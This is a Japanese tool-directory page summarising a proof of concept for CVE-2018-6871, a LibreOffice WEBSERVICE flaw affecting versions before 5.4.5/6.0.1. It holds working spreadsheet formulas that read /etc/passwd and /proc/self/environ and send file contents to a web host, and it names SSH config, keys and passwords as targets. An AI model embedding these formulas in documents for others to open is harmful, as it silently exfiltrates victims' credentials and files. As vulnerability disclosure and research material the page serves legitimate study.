Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
libreoffice-remote-arbitrary-file-disclosure — Proof of concept of LibreOffice remote arbitrary file disclosure vulnerability | Kitploit
ツール/GitHubGitHub/jollheef/libreoffice-remote-arbitrary-file-disclosure
Vulnerability AnalysisExploitationData ExfiltrationInformation Gathering
GitHubjollheef/libreoffice-remote-arbitrary-file-disclosure

libreoffice-remote-arbitrary-file-disclosure

Proof of concept of LibreOffice remote arbitrary file disclosure vulnerability

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
9698年前Kitploit レビュー済み

脆弱性の説明

CVE-2018-6871

第一部

LibreOfficeは COM.MICROSOFT.WEBSERVICE 関数をサポートしています:

root@kitploit:~
https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4

この関数はURLからデータを取得するために必要で、通常は次のように使用されます:

root@kitploit:~
=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")

原文では:

root@kitploit:~
For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.

LibreOfficeでは、5.4.5/6.0.1より前のバージョンではこれらの制限は実装されていません。

第二部

デフォルトではセルは更新されませんが、~error のようなセル型を指定すると、ドキュメントを開いたときにセルが更新されます。

悪用

ファイルを読み取るには、次のようにするだけです:

root@kitploit:~
=WEBSERVICE("/etc/passwd")

この関数はファイルを送信するためにも使用できます:

root@kitploit:~
=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))

成功させるには、現在のユーザーのファイルを送信する必要があるため、現在のユーザーのホームパスを取得する必要があります。

root@kitploit:~
=MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",

また、~/.ssh/config などの他のファイルも解析できます。

LibreOffice Calc 以外の形式では、Calc オブジェクトを他のドキュメントに埋め込むだけで済みます(動作することを確認しました)。

影響

キー、パスワード、その他あらゆるファイルを簡単に送信できます。成功率100%、完全に静かで、GNU/Linux、MS Windows、macOS などすべてのオペレーティングシステムにおいて 5.4.5/6.0.1 より前の LibreOffice に影響し、LO がサポートするほぼすべての形式に埋め込むことができます。

謝辞

この脆弱性は、私(@jollheef)と Ronnie Goodrich && Andrew Krasichkov によって独立して発見されました(LibreOffice チームのメモによる)。

ツールをダウンロード